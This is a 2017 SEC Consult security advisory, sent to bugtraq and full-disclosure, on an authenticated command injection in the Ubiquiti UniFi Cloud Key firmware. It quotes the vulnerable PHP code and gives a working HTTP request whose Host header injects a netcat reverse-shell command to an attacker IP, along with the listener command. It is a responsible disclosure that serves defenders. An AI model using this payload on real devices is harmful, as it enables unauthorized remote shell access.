SEC Consult SA-20170804-1 :: Ubiquiti Networks UniFi Cloud Key authenticated command injection

--WAWwt6GAGn9dNGeu3D49VS2TGgQlUwiBm
Content-Type: multipart/mixed; boundary="gqlvcOVI4EidxgfjRIbOKSIQ7ipwPLjuF";
 protected-headers="v1"
From: SEC Consult Vulnerability Lab <research@sec-consult.com>
To: bugtraq@securityfocus.com, fulldisclosure@seclists.org
Message-ID: <bee55eb3-cb9f-c75b-858b-3e280dc0d110@sec-consult.com>
Subject: SEC Consult SA-20170804-1 :: Ubiquiti Networks UniFi Cloud Key
 authenticated command injection

--gqlvcOVI4EidxgfjRIbOKSIQ7ipwPLjuF
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable

SEC Consult Vulnerability Lab Security Advisory < 20170804-1 >
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
              title: Authenticated Command Injection
            product: Ubiquiti Networks UniFi Cloud Key
 vulnerable version: Firmware v0.6.1
      fixed version: Firmware v0.6.4
         CVE number:
             impact: High
           homepage: https://www.ubnt.com
              found: 2017-03-26
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Mo=
scow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Z=
urich

                     https://www.sec-consult.com
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Vendor description:
-------------------
"Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets."

Source: http://ir.ubnt.com/


Business recommendation:
------------------------
SEC Consult recommends not to use this device in production until a thoro=
ugh
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
A command injection can be triggered via the hostname header in the statu=
s GET
request. This vulnerability can be exploited when the Cloud Key web inter=
face
is exposed to the Internet and an attacker has credentials to it.

Proof of concept:
-----------------
The following PHP snipplet is responsible for the command execution vulne=
rability:

(api.inc, line 265)
-------------------------------------------------------------------------=
------
[...]
function is_unifi_running() {
    if (!isset($_SERVER[HTTP_HOST])) {
            $c_host =3D $_SERVER[SERVER_ADDR];
    } else {
            $c_host =3D $_SERVER[HTTP_HOST];
    }
    $unifi_href =3D http:// . $c_host . :8080/status;
    exec(CMD_CURL . $unifi_href, $out, $rc);
    if ($rc =3D=3D 0) {
        return true;
    }
    return false;
}
[...]
-------------------------------------------------------------------------=
------

Since $c_host is not filtered, a command injection is possible.

The following GET request was used to open a reverse-shell via command in=
jection
from the Cloud Key system (192.168.0.30) to the attacker (192.168.0.3):
-------------------------------------------------------------------------=
------
GET /api/status HTTP/1.1
Host: 192.168.0.30;busybox nc 192.168.0.3 8999 -e bash;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firef=
ox/45.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=3D0.5
X-Access-Token: <Token>
Referer: https://192.168.0.30/login
Cookie: CKSESSIONID=3D<Session-ID>
Connection: close
-------------------------------------------------------------------------=
------

As the listener, netcat was used:
$ nc -lvp 8999

Vulnerable / tested versions:
-----------------------------
Ubiquiti Networks UniFi Cloud Key version 0.6.1 has been tested. This ver=
sion
was the latest at the time the security vulnerabilities were discovered.


Vendor contact timeline:
------------------------
2017-03-29: Contacting vendor via HackerOne. Vendor sets status to
            "Triaged".
2017-04-24: Asking for a status update; No answer.
2017-05-06: Found update 0.6.4 on the website of the vendor.
2017-05-15: Contacted vendor via e-mail and asked for status.
2017-05-16: Vendor closed the ticked and changed the status to resolved.
            Current firmware version was v0.6.4. Set the publication
            date to 2017-08-04 (at least 90 days after fix).
2017-08-04: Public release of security advisory

Solution:
---------
Upgrade to v0.6.4 or above.


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. I=
t
ensures the continued knowledge gain of SEC Consult in the field of netwo=
rk
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evalu=
ation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and v=
alid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consu=
lt?
Contact our local offices https://www.sec-consult.com/en/About/Contact.ht=
m
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF T. Weber / @2017


--gqlvcOVI4EidxgfjRIbOKSIQ7ipwPLjuF--

--WAWwt6GAGn9dNGeu3D49VS2TGgQlUwiBm
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBCAAGBQJZhIG8AAoJEC0t17XG7og/HCcP/Akd9a0ZfwFAWzDtK7FwuM+p
XW08QmRMPjfWCfnu2a4EaupoiOkramfJgzIn3jsFbHw0dV7Epol/bEVIt2DLxJHc
gXJ4VBzObuRt5Iy/VBHCAdtKHSD8EFhwvxceFFeFlPhIKwKSNRjsu5zs5nAjR443
jbBJ2f41HF90a+ZZKyPbpt0hVB+bs5M+ce0Ow7EmXyArWy3nAEdexMa8GMkSVbiZ
kDGd27As446FVV0i4WeWkJdztQaO4DKTAvp8EVvTyrtc2nhGR+WRXn4hSdoqlVQE
iKIXvxnEaImL5Wxv6X5SLDe44oxIHvwUS/O16c8o1rMxZGdl8mbXJz86S2Fu1+Bb
yxwhZsC57As3TIWAoNgNez8SLUSp3R+eVPEbugEPtLm0tj/yyU5MqPZCNcuT0TYl
jKIUgHs3RQA78VaCg+pK0cEQoQzoQvuABe27DC/+GOqpLEWEwaLOuTd5V9A5+oQr
XjlV3PE3LM3huYqCVGuyeKdRSWRMNqcHTckGM9AiYpl9es0dPEi7P606mUiORC55
xqiMVb2mjOwTSplBq2e+9mZMSWJcGkP07iZq0Vh6RUgOWNYqHK1soq3U7DDlWNXT
G1KaMxnkA2PpBNcY6DGs4fzC7HaxmQh4YSutxqxtIYvnYjlNutInjKLdJHS2E4aO
VCV1k5pG9WibonD06+iR
=IcqJ
-----END PGP SIGNATURE-----

--WAWwt6GAGn9dNGeu3D49VS2TGgQlUwiBm--